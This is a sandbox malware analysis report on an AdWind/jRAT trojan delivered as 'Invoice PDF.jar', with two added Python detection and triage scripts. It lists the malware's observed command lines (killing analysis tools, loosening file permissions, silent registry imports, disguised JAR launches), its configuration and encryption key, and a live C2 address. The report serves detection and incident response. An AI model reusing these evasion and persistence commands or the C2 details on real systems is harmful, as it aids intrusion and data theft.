
Analysis Report Invoice PDF.jar

Overview

General Information

Sample Name: Invoice PDF.jar
Analysis ID: 392877
MD5: 903b63e35bf8738809eab0f187027daf
SHA1: 257ff2ca9d7848e7c411790c3fa88a0aea479079
SHA256: bdfe705deebedf2b4edd1fee5bb225f3a14718f0a1007553fec5050db0f7fe08
Tags: Adwind, jar

Detection

ADWIND
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected ADWIND Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AdWind RAT
Yara detected AdWind RATs dll
Exploit detected, runtime environment starts unknown processes
Java source code contains strings found in CrossRAT
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses regedit.exe to modify the Windows registry
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Parent Process Executions
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • cmd.exe (PID: 6840 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'' >> C:\cmdlinestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • conhost.exe (PID: 4740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 6892 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar' MD5: 28733BA8C383E865338638DF5196E6FE)
      • icacls.exe (PID: 6968 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • wscript.exe (PID: 6992 cmdline: wscript C:\Users\user\bgddtomvyl.js MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • regedit.exe (PID: 7120 cmdline: 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg' MD5: 617538C965AC4DDC72F9CF647C4343D5)
        • javaw.exe (PID: 1540 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt' MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
          • java.exe (PID: 4596 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class MD5: 28733BA8C383E865338638DF5196E6FE)
            • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 6236 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • cscript.exe (PID: 6500 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
            • cmd.exe (PID: 6912 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • cscript.exe (PID: 6980 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
            • cmd.exe (PID: 4524 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6132 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cscript.exe (PID: 4248 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 724 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cscript.exe (PID: 6776 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • xcopy.exe (PID: 6848 cmdline: xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)
          • cmd.exe (PID: 6376 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 6664 cmdline: taskkill /IM ProcessHacker.exe /T /F MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
          • cmd.exe (PID: 2032 cmdline: cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup
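The tree above is the part of the report a responder can turn into detection logic: a JAR launched from a file with a .txt or .class extension, wscript/cscript and regedit fed files from the user profile, the whole JRE copied into AppData\Roaming\Oracle, taskkill against ProcessHacker, and icacls granting Everyone modify rights on a ProgramData path. Note that the -javaagent:jartracer.jar argument and the >> C:\cmdlinestart.log redirection on the first cmd.exe line are the sandbox's own Java instrumentation, not sample behaviour. The following Python script is an added example, not part of the Joe Sandbox report: it parses lines in the report's "image (PID: n cmdline: ... MD5: ...)" form and applies one rule per behaviour. The sample input is a constructed subset of the tree above with the instrumentation stripped; the rule names and the list of analysis-tool process names are assumptions of this example (only ProcessHacker.exe appears in the report).

```python
"""Flag jRAT/AdWind-style behaviour in a Joe Sandbox 'Startup' process tree.

Added example: the parser and rule names are this illustration's own,
not Joe Sandbox functionality.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: a subset of the Startup lines from the report above,
# with the sandbox's -javaagent:jartracer.jar instrumentation left out.
SAMPLE_TREE = r"""
• java.exe (PID: 6892 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\Desktop\Invoice PDF.jar' MD5: 28733BA8C383E865338638DF5196E6FE)
• icacls.exe (PID: 6968 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
• wscript.exe (PID: 6992 cmdline: wscript C:\Users\user\bgddtomvyl.js MD5: 7075DD7B9BE8807FCA93ACD86F724884)
• regedit.exe (PID: 7120 cmdline: 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg' MD5: 617538C965AC4DDC72F9CF647C4343D5)
• javaw.exe (PID: 1540 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt' MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
• java.exe (PID: 4596 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class MD5: 28733BA8C383E865338638DF5196E6FE)
• cscript.exe (PID: 6500 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
• xcopy.exe (PID: 6848 cmdline: xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)
• taskkill.exe (PID: 6664 cmdline: taskkill /IM ProcessHacker.exe /T /F MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
• conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
"""

# One process per line: optional bullet, image, PID, cmdline up to the MD5 field.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<image>\S+)\s+\(PID:\s*(?P<pid>\d+)\s+cmdline:\s*"
    r"(?P<cmd>.*?)\s+MD5:\s*[0-9A-Fa-f]{32}\)\s*$"
)
JAR_RE = re.compile(r"-jar\s+(?:'([^']*)'|(\S+))")          # quoted or bare -jar target
USER_SCRIPT_RE = re.compile(r"\\users\\.*\.(?:js|jse|vbs|vbe|wsf)\b")
USER_REG_RE = re.compile(r"\\users\\.*\.reg\b")
# Assumed list of analysis tools worth alerting on when killed; the report
# only shows ProcessHacker.exe.
ANALYSIS_TOOLS = {"processhacker.exe", "procexp.exe", "procexp64.exe",
                  "procmon.exe", "procmon64.exe", "wireshark.exe"}


def parse_tree(text: str) -> List[Tuple[str, int, str]]:
    """Return (image, pid, cmdline) for every parseable process line."""
    procs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs.append((m.group("image").lower(), int(m.group("pid")), m.group("cmd")))
    return procs


def find_indicators(text: str) -> List[Dict[str, object]]:
    """Apply one rule per observed jRAT/AdWind behaviour; return the hits."""
    findings: List[Dict[str, object]] = []

    def hit(pid: int, rule: str, detail: str) -> None:
        findings.append({"pid": pid, "rule": rule, "detail": detail})

    for image, pid, cmd in parse_tree(text):
        low = cmd.lower()
        if image in ("java.exe", "javaw.exe"):
            m = JAR_RE.search(cmd)
            if m:
                target = m.group(1) or m.group(2) or ""
                # A JAR is a ZIP; launching one named .txt/.class hides it from extension-based review.
                if not target.lower().endswith(".jar"):
                    hit(pid, "jar-launched-from-foreign-extension", target)
        elif image in ("wscript.exe", "cscript.exe"):
            if USER_SCRIPT_RE.search(low):
                hit(pid, "script-host-running-user-profile-script", cmd)
        elif image == "regedit.exe":
            if USER_REG_RE.search(low):
                hit(pid, "regedit-importing-user-profile-reg", cmd)
        elif image == "xcopy.exe":
            if "\\java\\jre" in low and "\\appdata\\roaming\\" in low:
                hit(pid, "jre-copied-into-roaming-profile", cmd)
        elif image == "taskkill.exe":
            m = re.search(r"/im\s+(\S+)", low)
            if m and m.group(1) in ANALYSIS_TOOLS:
                hit(pid, "analysis-tool-killed", m.group(1))
        elif image == "icacls.exe":
            if "/grant" in low and "everyone" in low:
                hit(pid, "icacls-grants-everyone-access", cmd)
    return findings


if __name__ == "__main__":
    for f in find_indicators(SAMPLE_TREE):
        print(f"{f['pid']:>5}  {f['rule']:<42} {f['detail']}")
```

On the constructed input the script reports eight hits and stays silent on the initial Invoice PDF.jar launch (a real .jar) and on conhost.exe; the same rules translate directly into process-creation telemetry queries, where the parent-child relation (javaw.exe spawning xcopy, taskkill and regedit) is the strongest signal.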

Malware Configuration

Threatname: AdWind

{"NETWORK": [{"PORT": 7777, "DNS": "127.0.0.1"}], "INSTALL": false, "MODULE_PATH": "zS/lq/BTk.GI", "PLUGIN_FOLDER": "DdWDtpinxpf", "JRE_FOLDER": "HSIROD", "JAR_FOLDER": "fUTkALeaTxM", "JAR_EXTENSION": "Vybgol", "ENCRYPT_KEY": "cPFjgddXIBcXBCIseEuXTZjwi", "DELAY_INSTALL": 2, "NICKNAME": "User", "VMWARE": false, "PLUGIN_EXTENSION": "DhjWU", "WEBSITE_PROJECT": "https://jrat.io", "JAR_NAME": "uiylKSALYJr", "JAR_REGISTRY": "WLyQyhWoosi", "DELAY_CONNECT": 2, "VBOX": false}

Caveat: the extracted configuration carries only a loopback C2 (127.0.0.1:7777) and "INSTALL": false, yet the run itself connects to 107.175.101.209:7865 (see the Snort alert under Networking), imports .reg files through regedit.exe and copies the JRE into C:\Users\user\AppData\Roaming\Oracle. Treat the extracted values as incomplete and use the observed endpoint, not the extracted one, as the network IOC.

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll | JoeSecurity_AdWind_dll | Yara detected AdWind RAT's dll | Joe Security
C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class | MAL_JRAT_Oct18_1 | Detects JRAT malware | Florian Roth
  • 0x36507:$x1: /JRat.class
  • 0x3af09:$x1: /JRat.class
C:\Users\user\AppData\Roaming\jhxromh.txt | MAL_JRAT_Oct18_1 | Detects JRAT malware | Florian Roth
  • 0x37b4a:$x1: /JRat.class
  • 0x76554:$x1: /JRat.class
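Both MAL_JRAT_Oct18_1 hits are on files whose names say .class and .txt but which the process tree launches with -jar, and the matched $x1 string /JRat.class at those offsets is consistent with a ZIP/JAR container holding a JRat.class entry (ZIP entry names sit in clear text in the local headers and central directory even when the entry data is deflated, so a plain string rule sees them). The following Python triage is an added example, not part of the report or of the Yara rule: it classifies a dropped file by magic bytes rather than extension, flags the extension mismatch the report's "Drops files with a non-matching file extension" signature describes, and lists the archive entries a rule keyed on /JRat.class would match. The files it scans are constructed stand-ins written to a temporary directory, not the real dropped files; the suffix list and function names are assumptions of the example.

```python
"""Triage dropped files by content rather than extension (jRAT/AdWind case).

Added example: constructed sample files, not the report's real artefacts.
"""
import os
import tempfile
import zipfile
from typing import Dict, List

ZIP_MAGIC = b"PK\x03\x04"          # local file header of a ZIP/JAR
CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # genuine Java class file
# Entry-name suffixes a string rule like MAL_JRAT_Oct18_1 ($x1 = "/JRat.class") keys on.
SUSPICIOUS_ENTRY_SUFFIXES = ("/JRat.class",)
EXPECTED_EXT = {"zip": (".jar", ".zip"), "class": (".class",)}


def sniff(path: str) -> str:
    """Return 'zip', 'class' or 'other' from the first four bytes."""
    with open(path, "rb") as fh:
        head = fh.read(4)
    if head == ZIP_MAGIC:
        return "zip"
    if head == CLASS_MAGIC:
        return "class"
    return "other"


def triage_file(path: str) -> Dict[str, object]:
    """Classify one file and list JRat-style entries if it is an archive."""
    kind = sniff(path)
    ext = os.path.splitext(path)[1].lower()
    result: Dict[str, object] = {
        "path": path,
        "content": kind,
        # A ZIP named .txt/.class or a class file named anything else is a disguise.
        "extension_mismatch": kind in EXPECTED_EXT and ext not in EXPECTED_EXT[kind],
        "jrat_entries": [],
    }
    if kind == "zip":
        with zipfile.ZipFile(path) as zf:
            names = zf.namelist()
        result["jrat_entries"] = [n for n in names if n.endswith(SUSPICIOUS_ENTRY_SUFFIXES)]
    return result


def build_samples(workdir: str) -> List[str]:
    """Constructed stand-ins for the dropped files (not the real samples)."""
    jar_as_txt = os.path.join(workdir, "jhxromh.txt")          # JAR disguised as .txt
    with zipfile.ZipFile(jar_as_txt, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: a.Main\n")
        zf.writestr("a/Main.class", CLASS_MAGIC + b"\x00" * 12)
        zf.writestr("a/b/JRat.class", CLASS_MAGIC + b"\x00" * 12)
    real_class = os.path.join(workdir, "Real.class")            # honest class file
    with open(real_class, "wb") as fh:
        fh.write(CLASS_MAGIC + b"\x00\x00\x00\x34")
    note = os.path.join(workdir, "README.txt")                  # honest text file
    with open(note, "w") as fh:
        fh.write("plain text\n")
    jar_as_class = os.path.join(workdir, "payload.class")       # JAR disguised as .class
    with zipfile.ZipFile(jar_as_class, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Main.class", CLASS_MAGIC + b"\x00" * 12)
    return [jar_as_txt, real_class, note, jar_as_class]


def run_demo() -> List[Dict[str, object]]:
    """Build the constructed files, triage each, and return the results."""
    with tempfile.TemporaryDirectory() as workdir:
        return [triage_file(p) for p in build_samples(workdir)]


if __name__ == "__main__":
    for r in run_demo():
        print(os.path.basename(str(r["path"])), r["content"],
              "MISMATCH" if r["extension_mismatch"] else "ok", r["jrat_entries"])
```

The magic-byte check is what matters operationally: the two disguised archives are reported as mismatches regardless of their names, while the genuine class file and the text file pass, and only the archive that actually contains a JRat.class entry is listed for the string rule.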

Memory Dumps

Source | Rule | Description | Author | Strings
Process Memory Space: java.exe PID: 4596 | JoeSecurity_AdWind | Yara detected AdWind RAT | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
10.2.java.exe.4881274.1.raw.unpack | JoeSecurity_AdWind_dll | Yara detected AdWind RAT's dll | Joe Security
9.2.javaw.exe.740d0000.8.unpack | JoeSecurity_AdWind_dll | Yara detected AdWind RAT's dll | Joe Security

Sigma Overview

System Summary:

Sigma detected: Conhost Parent Process Executions
Source: Process started | Author: omkar72 | Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6848, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 4740

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs | Avira: detection malicious, Label: VBS/Agent.276
Source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll | Avira: detection malicious, Label: TR/Spy.Agent.lusda
Source: C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs | Avira: detection malicious, Label: VBS/Agent.276
Source: C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs | Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs | Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll | Avira: detection malicious, Label: TR/Spy.Agent.3850
Found malware configuration
Source: java.exe.4596.10.memstr | Malware Configuration Extractor: AdWind {"NETWORK": [{"PORT": 7777, "DNS": "127.0.0.1"}], "INSTALL": false, "MODULE_PATH": "zS/lq/BTk.GI", "PLUGIN_FOLDER": "DdWDtpinxpf", "JRE_FOLDER": "HSIROD", "JAR_FOLDER": "fUTkALeaTxM", "JAR_EXTENSION": "Vybgol", "ENCRYPT_KEY": "cPFjgddXIBcXBCIseEuXTZjwi", "DELAY_INSTALL": 2, "NICKNAME": "User", "VMWARE": false, "PLUGIN_EXTENSION": "DhjWU", "WEBSITE_PROJECT": "https://jrat.io", "JAR_NAME": "uiylKSALYJr", "JAR_REGISTRY": "WLyQyhWoosi", "DELAY_CONNECT": 2, "VBOX": false}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll | Metadefender: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll | ReversingLabs: Detection: 74%
Source: C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll | Metadefender: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll | ReversingLabs: Detection: 65%
Multi AV Scanner detection for submitted file
Source: Invoice PDF.jar | Virustotal: Detection: 11%

Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb | source: javaw.exe, 00000009.00000002.602787359.00000000702E6000.00000002.00020000.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb | source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.590464923.0000000004881000.00000004.00000001.sdmp
Source: Binary string: b.pxb.ppb.phb.pXb.pDb.p8b.p,b.p | source: javaw.exe, 00000009.00000002.602797426.00000000702E9000.00000004.00020000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb | source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb | source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y | source: javaw.exe, 00000009.00000002.602787359.00000000702E6000.00000002.00020000.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\wscript.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2020728 ET TROJAN Possible Adwind/jSocket SSL Cert (assylias.Inc) 107.175.101.209:7865 -> 192.168.2.6:49739
Source: global traffic | TCP traffic: 192.168.2.6:49739 -> 107.175.101.209:7865
Source: Joe Sandbox View | ASN Name: NEXEONUS NEXEONUS
Source: unknown | TCP traffic detected without corresponding DNS query: 107.175.101.209 (50 occurrences)
The http://apache.org/xml/features/* strings that follow are feature URIs of the Xerces XML parser bundled with the JRE; they come from the Java runtime itself, not from the RAT, and are not network indicators.
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/3
Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/Ca
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsc
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/allow-java-encodingserRej9
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-erroret
Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes3
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes:
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes3
Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion#
Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansionS
Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
